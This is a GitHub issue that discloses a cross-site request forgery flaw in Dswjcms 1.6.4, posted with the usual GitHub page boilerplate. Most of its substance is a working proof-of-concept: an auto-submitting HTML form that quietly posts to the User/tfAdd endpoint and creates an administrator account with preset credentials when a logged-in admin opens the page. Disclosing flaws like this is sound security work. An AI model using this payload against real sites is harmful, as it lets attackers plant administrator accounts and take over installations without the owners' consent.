Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
After the administrator user logged in ,open the following page that can add a administrator user Exp:
<html> <body> <form id="csrf" name="csrf" action="http://127.0.0.1/index.php/Dswjcms/User/tfAdd" method="POST"> <input type="text" name="q" value="am" /> <input type="text" name="u" value="%2Findex.php%2FDswjcms%2FUser%2Fmanage.html" /> <input type="text" name="username" value="admin3" /> <input type="text" name="email" value="aadmin3@qq.com" /> <input type="text" name="password" value="admin3" /> <input type="submit" value="submit" /> </form> <script> document.csrf.submit(); </script> </body> </html>
The text was updated successfully, but these errors were encountered:
No branches or pull requests
A CSRF vulnerability exists in Dswjcms 1.6.4, allowing an attacker to add administrator users via the index.php/Dswjcms/User/tfAdd
After the administrator user logged in ,open the following page that can add a administrator user
Exp:
The text was updated successfully, but these errors were encountered: